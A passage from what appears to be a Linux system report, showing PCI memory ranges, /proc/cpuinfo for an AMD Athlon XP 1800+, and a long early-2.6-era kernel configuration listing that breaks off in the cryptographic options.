0xdc000000 [0xddffffff]. Non-prefetchable 32 bit memory at 0xde000000 [0xde003fff]. Non-prefetchable 32 bit memory at 0xdf000000 [0xdf7fffff]. $ cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 6 model name : AMD Athlon(tm) XP 1800+ stepping : 2 cpu MHz : 1534.010 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse syscall mp mmxext 3dnowext 3dnow bogomips : 3022.84 Kernel config: # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 # CONFIG_EMBEDDED is not set CONFIG_FUTEX=y CONFIG_EPOLL=y # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y CONFIG_MODVERSIONS=y CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set CONFIG_MK7=y # CONFIG_MK8 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set CONFIG_X86_GENERIC=y CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=7 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y # CONFIG_HUGETLB_PAGE is not set # CONFIG_SMP is not set CONFIG_PREEMPT=y CONFIG_X86_UP_APIC=y CONFIG_X86_UP_IOAPIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y # CONFIG_X86_MCE_P4THERMAL is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set CONFIG_X86_MSR=y CONFIG_X86_CPUID=y # CONFIG_EDD is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_SOFTWARE_SUSPEND is not set # # ACPI Support # CONFIG_ACPI=y # CONFIG_ACPI_HT_ONLY is not set CONFIG_ACPI_BOOT=y # CONFIG_ACPI_AC is not set # CONFIG_ACPI_BATTERY is not set CONFIG_ACPI_BUTTON=y CONFIG_ACPI_FAN=y CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y # CONFIG_ACPI_TOSHIBA is not set # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_BUS=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y # CONFIG_APM is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y CONFIG_PCI_GOBIOS=y # CONFIG_PCI_GODIRECT is not set # CONFIG_PCI_GOANY is not set CONFIG_PCI_BIOS=y CONFIG_PCI_LEGACY_PROC=y CONFIG_PCI_NAMES=y # CONFIG_ISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set CONFIG_HOTPLUG=y # # PCMCIA/CardBus support # # CONFIG_PCMCIA is not set # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_KCORE_ELF=y # CONFIG_KCORE_AOUT is not set CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_ELF=y CONFIG_BINFMT_MISC=y # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # # CONFIG_PARPORT is not set # # Plug and Play support # # CONFIG_PNP is not set # # Block devices # CONFIG_BLK_DEV_FD=y # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set CONFIG_BLK_DEV_LOOP=y # CONFIG_BLK_DEV_NBD is not set # CONFIG_BLK_DEV_RAM is not set # CONFIG_BLK_DEV_INITRD is not set # CONFIG_LBD is not set # # ATA/ATAPI/MFM/RLL device support # CONFIG_IDE=y # # IDE, ATA and ATAPI Block devices # CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set # CONFIG_BLK_DEV_HD is not set CONFIG_BLK_DEV_IDEDISK=y # CONFIG_IDEDISK_MULTI_MODE is not set # CONFIG_IDEDISK_STROKE is not set CONFIG_BLK_DEV_IDECD=y CONFIG_BLK_DEV_IDEFLOPPY=y # CONFIG_IDE_TASK_IOCTL is not set # # IDE chipset support/bugfixes # # CONFIG_BLK_DEV_CMD640 is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_BLK_DEV_GENERIC=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDE_TCQ is not set # CONFIG_BLK_DEV_OFFBOARD is not set # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_PCI_WIP is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_HPT34X is not set CONFIG_BLK_DEV_HPT366=y # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_RZ1000 is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set CONFIG_BLK_DEV_VIA82CXXX=y CONFIG_IDEDMA_AUTO=y # CONFIG_IDEDMA_IVB is not set CONFIG_BLK_DEV_IDE_MODES=y # # SCSI device support # # CONFIG_SCSI is not set # # Multi-device support (RAID and LVM) # CONFIG_MD=y CONFIG_BLK_DEV_MD=y # CONFIG_MD_LINEAR is not set CONFIG_MD_RAID0=y # CONFIG_MD_RAID1 is not set # CONFIG_MD_RAID5 is not set # CONFIG_MD_MULTIPATH is not set # CONFIG_BLK_DEV_DM is not set # # Fusion MPT device support # # # IEEE 1394 (FireWire) support (EXPERIMENTAL) # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y CONFIG_PACKET_MMAP=y # CONFIG_NETLINK_DEV is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set CONFIG_UNIX=y # CONFIG_NET_KEY is not set CONFIG_INET=y # CONFIG_IP_MULTICAST is not set # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_ARPD is not set # CONFIG_INET_ECN is not set # CONFIG_SYN_COOKIES is not set CONFIG_INET_AH=y CONFIG_INET_ESP=y CONFIG_INET_IPCOMP=y # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=m CONFIG_IP_NF_FTP=m CONFIG_IP_NF_IRC=m CONFIG_IP_NF_TFTP=m # CONFIG_IP_NF_AMANDA is not set # CONFIG_IP_NF_QUEUE is not set CONFIG_IP_NF_IPTABLES=y CONFIG_IP_NF_MATCH_LIMIT=m CONFIG_IP_NF_MATCH_MAC=m CONFIG_IP_NF_MATCH_PKTTYPE=m # CONFIG_IP_NF_MATCH_MARK is not set CONFIG_IP_NF_MATCH_MULTIPORT=m CONFIG_IP_NF_MATCH_TOS=m CONFIG_IP_NF_MATCH_ECN=m CONFIG_IP_NF_MATCH_DSCP=m CONFIG_IP_NF_MATCH_AH_ESP=m CONFIG_IP_NF_MATCH_LENGTH=m CONFIG_IP_NF_MATCH_TTL=m CONFIG_IP_NF_MATCH_TCPMSS=m CONFIG_IP_NF_MATCH_HELPER=m CONFIG_IP_NF_MATCH_STATE=m CONFIG_IP_NF_MATCH_CONNTRACK=m # CONFIG_IP_NF_MATCH_UNCLEAN is not set # CONFIG_IP_NF_MATCH_OWNER is not set CONFIG_IP_NF_FILTER=m CONFIG_IP_NF_TARGET_REJECT=m # CONFIG_IP_NF_TARGET_MIRROR is not set CONFIG_IP_NF_NAT=m CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=m CONFIG_IP_NF_TARGET_REDIRECT=m # CONFIG_IP_NF_NAT_LOCAL is not set # CONFIG_IP_NF_NAT_SNMP_BASIC is not set CONFIG_IP_NF_NAT_IRC=m CONFIG_IP_NF_NAT_FTP=m CONFIG_IP_NF_NAT_TFTP=m CONFIG_IP_NF_MANGLE=m CONFIG_IP_NF_TARGET_TOS=m CONFIG_IP_NF_TARGET_ECN=m CONFIG_IP_NF_TARGET_DSCP=m CONFIG_IP_NF_TARGET_MARK=m # CONFIG_IP_NF_TARGET_LOG is not set # CONFIG_IP_NF_TARGET_ULOG is not set # CONFIG_IP_NF_TARGET_TCPMSS is not set CONFIG_IP_NF_ARPTABLES=m CONFIG_IP_NF_ARPFILTER=m CONFIG_IPV6=y # CONFIG_IPV6_PRIVACY is not set CONFIG_INET6_AH=m CONFIG_INET6_ESP=m # CONFIG_INET6_IPCOMP is not set # # IPv6: Netfilter Configuration # CONFIG_IP6_NF_QUEUE=m CONFIG_IP6_NF_IPTABLES=m CONFIG_IP6_NF_MATCH_LIMIT=m CONFIG_IP6_NF_MATCH_MAC=m CONFIG_IP6_NF_MATCH_RT=m CONFIG_IP6_NF_MATCH_OPTS=m CONFIG_IP6_NF_MATCH_FRAG=m CONFIG_IP6_NF_MATCH_HL=m CONFIG_IP6_NF_MATCH_MULTIPORT=m CONFIG_IP6_NF_MATCH_OWNER=m CONFIG_IP6_NF_MATCH_MARK=m CONFIG_IP6_NF_MATCH_IPV6HEADER=m CONFIG_IP6_NF_MATCH_AHESP=m CONFIG_IP6_NF_MATCH_LENGTH=m CONFIG_IP6_NF_MATCH_EUI64=m CONFIG_IP6_NF_FILTER=m # CONFIG_IP6_NF_TARGET_LOG is not set CONFIG_IP6_NF_MANGLE=m CONFIG_IP6_NF_TARGET_MARK=m # CONFIG_XFRM_USER is not set # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IPV6_SCTP__=y # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_VLAN_8021Q is not set # CONFIG_LLC is not set # CONFIG_DECNET is not set # CONFIG_BRIDGE is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set # CONFIG_DUMMY is not set # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set CONFIG_TUN=m # CONFIG_ETHERTAP is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y CONFIG_MII=y # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_NET_VENDOR_3COM is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_B44 is not set # CONFIG_DGRS is not set # CONFIG_EEPRO100 is not set # CONFIG_E100 is not set # CONFIG_FEALNX is not set # CONFIG_NATSEMI is not set # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set CONFIG_8139TOO=y # CONFIG_8139TOO_PIO is not set # CONFIG_8139TOO_TUNE_TWISTER is not set # CONFIG_8139TOO_8129 is not set # CONFIG_8139_OLD_RX_RESET is not set # CONFIG_SIS900 is not set # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_TLAN is not set # CONFIG_VIA_RHINE is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PPP is not set # CONFIG_SLIP is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Token Ring devices (depends on LLC=y) # # CONFIG_RCPCI is not set # CONFIG_SHAPER is not set # # Wan interfaces # # CONFIG_WAN is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA (infrared) support # CONFIG_IRDA=y # # IrDA protocols # # CONFIG_IRLAN is not set CONFIG_IRCOMM=y CONFIG_IRDA_ULTRA=y # # IrDA options # CONFIG_IRDA_CACHE_LAST_LSAP=y CONFIG_IRDA_FAST_RR=y CONFIG_IRDA_DEBUG=y # # Infrared-port device drivers # # # SIR device drivers # # CONFIG_IRTTY_SIR is not set # # Dongle support # # CONFIG_DONGLE is not set # # Old SIR device drivers # # CONFIG_IRTTY_OLD is not set CONFIG_IRPORT_SIR=y # # Old Serial dongle support # # CONFIG_DONGLE_OLD is not set # # FIR device drivers # CONFIG_USB_IRDA=y # CONFIG_NSC_FIR is not set # CONFIG_WINBOND_FIR is not set # CONFIG_TOSHIBA_OLD is not set # CONFIG_TOSHIBA_FIR is not set # CONFIG_SMC_IRCC_OLD is not set # CONFIG_SMC_IRCC_FIR is not set # CONFIG_ALI_FIR is not set # CONFIG_VLSI_FIR is not set # # ISDN subsystem # # CONFIG_ISDN_BOOL is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # # CONFIG_INPUT_MOUSEDEV is not set # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=y # CONFIG_SERIO_CT82C710 is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y # CONFIG_MOUSE_PS2 is not set CONFIG_MOUSE_SERIAL=y # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set CONFIG_INPUT_MISC=y CONFIG_INPUT_PCSPKR=y # CONFIG_INPUT_UINPUT is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y # CONFIG_SERIAL_8250_CONSOLE is not set CONFIG_SERIAL_8250_EXTENDED=y # CONFIG_SERIAL_8250_MANY_PORTS is not set CONFIG_SERIAL_8250_SHARE_IRQ=y # CONFIG_SERIAL_8250_DETECT_IRQ is not set # CONFIG_SERIAL_8250_MULTIPORT is not set # CONFIG_SERIAL_8250_RSA is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 # # I2C support # CONFIG_I2C=y CONFIG_I2C_ALGOBIT=y # CONFIG_I2C_ELV is not set # CONFIG_I2C_VELLEMAN is not set # CONFIG_SCx200_ACB is not set CONFIG_I2C_ALGOPCF=y # CONFIG_I2C_ELEKTOR is not set CONFIG_I2C_CHARDEV=y # # I2C Hardware Sensors Mainboard support # # CONFIG_I2C_ALI15X3 is not set # CONFIG_I2C_AMD756 is not set # CONFIG_I2C_AMD8111 is not set # CONFIG_I2C_I801 is not set # CONFIG_I2C_PIIX4 is not set # CONFIG_I2C_SIS96X is not set CONFIG_I2C_VIAPRO=y # # I2C Hardware Sensors Chip support # # CONFIG_SENSORS_ADM1021 is not set # CONFIG_SENSORS_IT87 is not set # CONFIG_SENSORS_LM75 is not set CONFIG_SENSORS_VIA686A=y # CONFIG_SENSORS_W83781D is not set CONFIG_I2C_SENSOR=y # # Mice # # CONFIG_BUSMOUSE is not set # CONFIG_QIC02_TAPE is not set # # IPMI # CONFIG_IPMI_HANDLER=y # CONFIG_IPMI_PANIC_EVENT is not set CONFIG_IPMI_DEVICE_INTERFACE=y # CONFIG_IPMI_KCS is not set # CONFIG_IPMI_WATCHDOG is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_HW_RANDOM is not set # CONFIG_NVRAM is not set CONFIG_RTC=y # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=y # CONFIG_AGP_ALI is not set # CONFIG_AGP_AMD is not set # CONFIG_AGP_AMD_8151 is not set # CONFIG_AGP_INTEL is not set # CONFIG_AGP_NVIDIA is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_SWORKS is not set CONFIG_AGP_VIA=y CONFIG_DRM=y # CONFIG_DRM_TDFX is not set # CONFIG_DRM_GAMMA is not set # CONFIG_DRM_R128 is not set # CONFIG_DRM_RADEON is not set CONFIG_DRM_MGA=y # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HANGCHECK_TIMER is not set # # Multimedia devices # CONFIG_VIDEO_DEV=y # # Video For Linux # CONFIG_VIDEO_PROC_FS=y # # Video Adapters # # CONFIG_VIDEO_BT848 is not set CONFIG_VIDEO_IVTV=m # CONFIG_VIDEO_PMS is not set # CONFIG_VIDEO_CPIA is not set # CONFIG_VIDEO_SAA5249 is not set # CONFIG_TUNER_3036 is not set # CONFIG_VIDEO_STRADIS is not set # CONFIG_VIDEO_ZORAN is not set # CONFIG_VIDEO_ZR36120 is not set # CONFIG_VIDEO_SAA7134 is not set # CONFIG_VIDEO_MXB is not set # CONFIG_VIDEO_DPC is not set # # Radio Adapters # # CONFIG_RADIO_GEMTEK_PCI is not set # CONFIG_RADIO_MAXIRADIO is not set # CONFIG_RADIO_MAESTRO is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set CONFIG_VIDEO_TUNER=m CONFIG_VIDEO_BUF=m # CONFIG_VIDEO_BTCX is not set # # File systems # CONFIG_EXT2_FS=y # CONFIG_EXT2_FS_XATTR is not set CONFIG_EXT3_FS=y # CONFIG_EXT3_FS_XATTR is not set CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set # CONFIG_REISERFS_FS is not set # CONFIG_JFS_FS is not set # CONFIG_XFS_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_ROMFS_FS is not set # CONFIG_QUOTA is not set # CONFIG_AUTOFS_FS is not set # CONFIG_AUTOFS4_FS is not set # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_ZISOFS=y CONFIG_ZISOFS_FS=y CONFIG_UDF_FS=y # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y # CONFIG_NTFS_FS is not set # # Pseudo filesystems # CONFIG_PROC_FS=y # CONFIG_DEVFS_FS is not set # CONFIG_DEVPTS_FS is not set # CONFIG_TMPFS is not set CONFIG_RAMFS=y # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # # CONFIG_NFS_FS is not set # CONFIG_NFSD is not set # CONFIG_EXPORTFS is not set # CONFIG_SMB_FS is not set # CONFIG_CIFS is not set # CONFIG_NCP_FS is not set # CONFIG_CODA_FS is not set # CONFIG_INTERMEZZO_FS is not set # CONFIG_AFS_FS is not set # # Partition Types # CONFIG_PARTITION_ADVANCED=y # CONFIG_ACORN_PARTITION is not set # CONFIG_OSF_PARTITION is not set # CONFIG_AMIGA_PARTITION is not set # CONFIG_ATARI_PARTITION is not set # CONFIG_MAC_PARTITION is not set CONFIG_MSDOS_PARTITION=y # CONFIG_BSD_DISKLABEL is not set # CONFIG_MINIX_SUBPARTITION is not set # CONFIG_SOLARIS_X86_PARTITION is not set # CONFIG_UNIXWARE_DISKLABEL is not set # CONFIG_LDM_PARTITION is not set # CONFIG_NEC98_PARTITION is not set # CONFIG_SGI_PARTITION is not set # CONFIG_ULTRIX_PARTITION is not set # CONFIG_SUN_PARTITION is not set # CONFIG_EFI_PARTITION is not set CONFIG_NLS=y # # Native Language Support # CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=y # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set CONFIG_NLS_ISO8859_1=y # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set # CONFIG_NLS_UTF8 is not set # # Graphics support # # CONFIG_FB is not set CONFIG_VIDEO_SELECT=y # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y # # Sound # CONFIG_SOUND=y # # Advanced Linux Sound Architecture # CONFIG_SND=y CONFIG_SND_SEQUENCER=y # CONFIG_SND_SEQ_DUMMY is not set CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=y CONFIG_SND_PCM_OSS=y CONFIG_SND_SEQUENCER_OSS=y CONFIG_SND_RTCTIMER=y # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # # CONFIG_SND_DUMMY is not set # CONFIG_SND_VIRMIDI is not set # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set CONFIG_SND_MPU401=y # # PCI devices # # CONFIG_SND_ALI5451 is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set # CONFIG_SND_EMU10K1 is not set # CONFIG_SND_KORG1212 is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_YMFPCI is not set # CONFIG_SND_ALS4000 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_ENS1370 is not set CONFIG_SND_ENS1371=y # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set # CONFIG_SND_INTEL8X0 is not set # CONFIG_SND_SONICVIBES is not set # CONFIG_SND_VIA82XX is not set # # ALSA USB devices # # CONFIG_SND_USB_AUDIO is not set # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # USB support # CONFIG_USB=y CONFIG_USB_DEBUG=y # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_BANDWIDTH is not set CONFIG_USB_DYNAMIC_MINORS=y # # USB Host Controller Drivers # # CONFIG_USB_EHCI_HCD is not set # CONFIG_USB_OHCI_HCD is not set # CONFIG_USB_UHCI_HCD is not set # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set # # SCSI support is needed for USB Storage # # # USB Human Interface Devices (HID) # # CONFIG_USB_HID is not set # # USB HID Boot Protocol drivers # # CONFIG_USB_KBD is not set # CONFIG_USB_MOUSE is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_XPAD is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_SCANNER is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # CONFIG_USB_VICAM is not set # CONFIG_USB_DSBR is not set # CONFIG_USB_IBMCAM is not set # CONFIG_USB_KONICAWC is not set # CONFIG_USB_OV511 is not set # CONFIG_USB_PWC is not set # CONFIG_USB_SE401 is not set # CONFIG_USB_STV680 is not set # # USB Network adaptors # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_BRLVGER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_TEST is not set # CONFIG_USB_GADGET is not set # # Bluetooth support # # CONFIG_BT is not set # # Profiling support # CONFIG_PROFILING=y CONFIG_OPROFILE=m # # Kernel hacking # CONFIG_DEBUG_KERNEL=y CONFIG_DEBUG_STACKOVERFLOW=y CONFIG_DEBUG_SLAB=y CONFIG_DEBUG_IOVIRT=y CONFIG_MAGIC_SYSRQ=y CONFIG_DEBUG_SPINLOCK=y CONFIG_KALLSYMS=y CONFIG_DEBUG_SPINLOCK_SLEEP=y CONFIG_FRAME_POINTER=y CONFIG_X86_EXTRA_IRQS=y CONFIG_X86_FIND_SMP_CONFIG=y CONFIG_X86_MPPARSE=y # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # CONFIG_CRYPTO=y CONFIG_CRYPTO_HMAC=y # CONFIG_CRYPTO_NULL is not set CONFIG_CRYPTO_MD4=m CONFIG_CRYPTO_MD5=m 